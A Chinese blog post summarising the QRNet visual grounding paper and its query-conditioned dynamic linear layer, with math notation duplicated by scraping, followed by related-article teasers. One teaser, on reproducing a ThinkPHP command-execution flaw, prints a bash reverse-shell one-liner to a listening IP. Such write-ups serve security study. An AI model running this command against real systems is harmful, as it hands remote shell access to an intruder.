【论文阅读visual grounding】QRNet论文解读与关键代码实现

Shifting More Attention to Visual Backbone: Query-modulated Refinement Networks for End-to-End Visual Grounding

论文链接:https://arxiv.org/abs/2203.15442
代码链接:https://github.com/z-w-wang/QRNet

Motivation

视觉定位(visual grounding or referring expression comprehension)任务的目标是在查询文本(Query Expression)和特定区域之间建立细粒度的联系,但是目前的方法主要使用查询无关的视觉骨干网抽取视觉特征,导致预训练的视觉编码器抽取到的特征和实际多模态推理需要的特征不一致,如论文的Fig. 1a所示。所以作者提出在视觉骨干网训练的同时注入文本信息(Fig. 1b),让网络能够动态调整查询相关的区域,进而提升视觉定位性能。
在这里插入图片描述

核心思路:Dynamic Layer

本文最核心的设计是把1d的文本特征 p l c ∈ R B × D q p_l^c\in \mathbb{R}^{B\times D_q} plcRB×Dq融入到视觉特征 F ∈ R B × H × W × D i n F\in\mathbb{R}^{B\times H \times W\times D_{in}} FRB×H×W×Din中,并且要根据文本特征的查询内容动态调整视觉特征的关注区域,所以作者设计了一个动态线性层,具体思路如下:

线性映射,扩充 p l c p_l^c plc的隐层维度

使用线性映射的操作,将 p l c p_l^c plc的隐层维度由原来的 D q D_q Dq映射到 ( D i n + 1 ) × K (D_{in}+1)\times K (Din+1)×K,为后续reshape操作做准备

reshape

将文本特征由1d转为2d得到系数矩阵 U ∈ R ( D i n + 1 ) × K U\in \mathbb{R}^{(D_{in}+1)\times K} UR(Din+1)×K,转换的同时确定维度与 S S S对应。

生成静态可学习矩阵 S S S,利用其选择系数矩阵中的关键信息

S ∈ R K × D o u t S\in \mathbb{R}^{K\times D_{out}} SRK×Dout

生成参数矩阵

M l = U S M_l=US Ml=US

分割参数矩阵得到权重 W l W_l Wl和偏置 b l b_l bl

{ W l , b l } = s p l i t ( M l ) \{W_l,b_l\}=split(M_l) {Wl,bl}=split(Ml)

利用从文本特征得到的关键信息的权重和偏置选择视觉特征中的查询相关的内容

o u t p u t = F W l + b l , o u t p u t ∈ R B × H × W × D o u t output=F W_l+b_l,output\in\mathbb{R}^{B\times H \times W\times D_{out}} output=FWl+bl,outputRB×H×W×Dout
可以看到,动态线性层只改变视觉特征的隐层维度,所以就可以利用这一点结合通道注意力机制和空间注意力机制对原始的图像特征进行动态赋权,实现动机中的目标。
上述内容的代码细节可以参看代码链接中的dynamicLayer部分,这里只对伪代码做一下展示
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/390208.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2023-2024年 Java开发岗面试题经验分享

在各行各业中,面试前我们总会思索一个问题:究竟什么样的求职者能获得面试官的青睐?作为求职者,我们又该如何准备,以应对各种面试官的挑战?在这激烈的竞争里,如何才能让自己从众多应聘者中脱颖而…

ai web 1.0靶机漏洞渗透详解

一、导入靶机 解压下载好的靶机,然后打开VMware,点击文件》打开》找到刚刚解压的靶机点击下面的文件》打开 确认是靶机的网络连接模式是NAT模式 二、信息收集 1、主机发现 在本机的命令窗口输入ipconfig查看VMnet8这块网卡,这块网卡就是虚…

历届奥运会奖牌数据(1896年-2024年7月)

奥运会,全称奥林匹克运动会(Olympic Games),是国际奥林匹克委员会主办的世界规模最大的综合性体育赛事,每四年一届,会期不超过16天。这项历史悠久的赛事起源于古希腊,现代奥运会则始于1896年的希…

抖音豆包大模型AI写作教程

简数采集器支持调用字节跳动抖音的豆包AI大模型API接口,用于对采集的数据进行研究分析,内容写作等。 抖音豆包大模型AI写作使用教程: 目录 1.启用豆包AI大模型API功能 2.设置豆包API处理规则 3.应用API规则处理数据 4.获取AI处理结果 1…

ATTCK实战系列-红队评估 (一)Vulnstack三层网络域渗透

目录 一、搭建环境 1.靶场下载地址: 2、网络拓扑 3、环境配置 Win7(外网服务器 ) Win2008(域控) Win2003(域成员) 4、启动环境 二、信息收集 1、端口扫描 2、目录扫描 三、漏洞利用…

目标检测,目标跟踪,目标追踪

个人专做目标检测,目标跟踪,目标追踪,deepsort。YOLOv5 yolov8 yolov7 yolov3运行指导、环境配置、数据集配置等(也可解决代码bug),cpu,gpu,可直接运行,本地安装或者远程…

springboot基于微信老人健康与饮食管理系统-计算机毕业设计源码82939

基于微信老人健康与饮食管理系统的小程序 摘 要 基于Spring Boot的微信老人健康与饮食管理系统的小程序致力于为老年人提供便捷的健康管理和饮食指导服务。该小程序整合了健康资讯浏览、食谱推荐、健康评估等功能模块,通过系统的设计与实现,旨在帮助老年…

uniapp全局分享功能实现方法(依赖小程序右上角的分享按钮)

1、uniapp开发小程序时默认是关闭分享功能的。点击右上角三个点可查看,效果图如下: 2、在utils文件夹下新建share.js文件,名字任起。(使用的是全局分享,因为一个一个页面的去分享太麻烦且没必要。) export…

### 微软的传奇与未来:从车库到云端的飞跃

今天我要和大家聊聊科技界的超级明星——微软。这家公司几乎每个人都听过,从90年Windows全家桶,到现在的云端革命,微软的故事简直有点儿像科技界的“美国梦”。 #### **车库里的梦想** 一切都得从1975年说起。当时,比尔盖茨和保…

thinkphp之命令执行漏洞复现

实战: fofa搜索thinkphp-- 第一步:先在dns平台上,点击Get SubDomain ,监控我们的注入效果 返回dnslog查看到了Java的版本信息 打开kali监听端口 进行base64编码 bash -i >& /dev/tcp/192.168.189.150/8080 0>&1 …

AS400==tutorial for Beginners

系统AS400 语言RPGLE 参考视频: https://www.youtube.com/watch?vFqgwYsp7mjk&listPL3W4xRdnQJHVWWmYX1Klji7QUk_PQhq0t&index5 Lesson 1 | Introduction to As-400 and setting up As-400 Environment. 客户端软件TN5250 Terminal Emulation for Window…

Null Reference: 避免和解决空引用错误

Null Reference: 避免和解决空引用错误 🚫 **Null Reference: 避免和解决空引用错误 🚫**摘要引言正文内容1. 理解空引用错误1.1 什么是空引用1.2 空引用的影响 2. 空引用错误的常见原因2.1 未初始化的变量2.2 访问已被清空的对象2.3 方法返回空引用 3. …

U盘数据恢复不再难:2024年4款工具,找回你“躲藏”的记忆

现在市面上有一些非常棒的U盘数据恢复软件,它们特别好用,就算你对电脑不太懂也能轻松搞定。这些软件能在几分钟之内帮你检查U盘,找出那些被误删的照片、文件和视频,让你可以轻松把它们找回来。不管你是自己用还是工作需要&#xf…

深度学习入门——卷积神经网络

本章的主题是卷积神经网络(Convolutional Neural Network,CNN)。CNN被用于图像识别、语音识别等各种场合,在图像识别的比赛中,基于深度学习的方法几乎都以CNN为基础。本章将详细介绍CNN的结构,并用Python实…

java之异常

目录 一、简介 二、作用 三、JVM默认处理异常方式 四、捕获异常 1.格式 2.目的 3.示例 五、灵魂四问 1.如果try中没有遇到问题,怎么执行? 2.如果try中可能会遇到多个问题,怎么处理? 3.如果try中遇到的问题没有被捕获&am…

分布式日志分析系统--ELK

文章目录 ELK概述ELK主要特点ELK应用架构 Elasticsearch原理JSON格式倒排索引 ES与关系型数据库ES相关概念ES安装说明1.环境初始化2.优化系统资源限制配置3.编辑ES服务文件elasticsearch. yml 优化ELK集群安装脚本scp的使用集群安装成功 Shell命令API使用创建索引创建Type创建分…

《从零开始:使用Python构建简单Web爬虫》

前言 随着互联网信息的爆炸性增长,如何高效地获取和处理这些数据变得越来越重要。Web爬虫作为一种自动化工具,可以帮助我们快速抓取所需的网页内容。本文将介绍如何使用Python编写一个简单的Web爬虫,并通过实例演示其基本用法。 准备工作 …

VMware安装Centos虚拟机使用NAT模式无法上网问题处理

NAT模式无法上网问题处理 Centos7与Ubuntu使用同一个NAT网络,Ubuntu正常访问互联网,Centos无法正常访问。 处理方案: cd /etc/sysconfig/network-scripts vi ifcfg-ens33 修改配置项: 重启网络: service network resta…

【源码阅读】Redisson lock源码

目录 底层原理 加锁机制 锁互斥机制 可重入锁机制 总结 Redisson 加锁非常简单,还支持 redis 单实例、redis 哨兵、redis cluster、redis master-slave 等各种部署架构 RLock lock redisson.getLock("cyk-test"); lock.lock(); lock.unlock(); 底…

华为路由常见 LSA 类型的产生及作用域和字段详细解读

华为路由常见 LSA 类型的产生及作用域 类型名称描述1路由器 LSA(Router LSA)每个设备都会产生,描述了设备的链路状态和开销。该 LSA 只能在接口所属的区域内泛洪2网络 LSA(Network LSA)由 DR 产生,描述该 …